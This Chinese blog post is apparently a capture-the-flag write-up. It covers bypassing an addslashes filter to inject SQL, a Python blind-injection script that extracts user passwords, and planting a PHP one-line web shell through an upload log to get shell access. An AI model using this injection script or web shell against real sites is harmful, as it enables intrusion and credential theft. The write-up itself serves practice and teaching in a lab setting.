太久没打比赛,羊城杯被虐爆了,开始复健.

进入正题.

打开网页是登录框,随便输入账号密码,抓包,发现user.php.但是没有别的线索,扫下目录发现robots.txt.进入后发现可以下载备份文件,但是无法下载index.php,f12继续收集线索,图片那里有个image.php,尝试下载其备份,成功.

image.php:

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
?>

看源码应该是sql注入.id和path处用addslashes函数做了处理.addslashes函数作用.之后又对id和path进行了过滤.结合前面的addslashes,绕过过滤:?id=\0'&path=or 1=1%23.其中id经过addslashes处理之后变为\\0\',过滤之后剩下\,所以查询语句变为select * from images where id='\' or path='or 1=1#',成功注入.接下来运行盲注脚本:

import requests

url = 'http://e4bad4d9-a501-4046-9b3d-ea44d661d6d5.node3.buuoj.cn/image.php'
flag = ''
for i in range(1,300):
    print(i)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        payload = "?id=\\0'&path=or ascii(substr((select password from users),{},1))>{}%23".format(i,mid)
        r = requests.get(url=url+payload)
        if "JFIF" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)

(JFIF是抓image.php的包看到的.)

成功获取用户名和密码后,登录,一个文件上传界面.上传的东西会被放进日志里,将filename写为一句话木马,<?php不可用,使用短标签:<?=@eval($_POST['k']);?>蚁剑连接,flag在根目录.

 

 

 

 

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号